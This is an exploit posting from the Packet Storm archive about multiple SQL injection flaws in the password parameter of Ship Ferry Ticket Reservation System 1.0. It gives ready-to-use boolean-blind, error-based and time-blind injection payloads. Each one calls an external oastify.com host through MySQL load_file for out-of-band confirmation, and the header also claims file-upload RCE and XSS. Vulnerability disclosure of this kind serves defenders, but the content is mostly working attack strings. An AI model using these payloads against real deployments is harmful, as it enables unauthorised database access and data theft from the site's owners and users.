exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ship Ferry Ticket Reservation System 1.0 SQL Injection

Ship Ferry Ticket Reservation System 1.0 SQL Injection
Posted Sep 16, 2024
Authored by nu11secur1ty

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | aefb5eeb623cfb1e4c92c60d84ce01babb17cb392dd12a995515335011e12235

Ship Ferry Ticket Reservation System 1.0 SQL Injection

Change Mirror Download
## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi
### Bonus: FU + RCE & XSS - Information disclosure
## Author: nu11secur1ty
## Date: 09/14/2024
## Vendor: https://github.com/oretnom23
## Software:
https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\
wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submitted
in the password parameter. This payload injects a SQL sub-query that calls
MySQL's load_file function with a UNC file path that references a URL on an
external domain. The application interacted with that domain, indicating
that the injected SQL query was executed. The attacker can get all the
information from the database of this system, and he can do very malicious
action against the owner of this application!

STATUS: HIGH- Vulnerability for deprecation!
WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!
https://github.com/oretnom23


[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\
wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT
9033=9033 AND ('ehPW'='ehPW

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\
wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT
4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT
(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\
wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT
1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw
---
```

## Reproduce:
[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)

## Proof and Exploit:
[href](
https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html
)

## Time spent:
00:17:00


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close